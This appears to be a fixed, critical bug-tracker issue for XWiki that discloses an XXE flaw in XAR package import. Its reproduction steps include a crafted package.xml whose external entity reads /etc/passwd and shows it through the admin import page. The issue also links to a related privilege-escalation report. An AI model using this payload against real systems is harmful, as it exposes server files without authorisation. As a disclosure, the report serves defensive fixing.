Details
-
Bug
-
Resolution: Fixed
-
Critical
-
1.1 M3
-
Unknown
-
N/A
-
N/A
-
Description
To reproduce:
- Create a XAR package and modify the package.xml's like this:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <package> <infos> <name>&xxe;</name> <description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description> <licence></licence> <author>XWiki.Admin</author> ...
- Go to the Admin UI > Import
- Notice that this allows you to see the content of /etc/passwd
Attachments
Issue Links
- is related to
-
XWIKI-20267 Privilege escalation (PR) from account through AdminImportSheet/importinline.vm
- Closed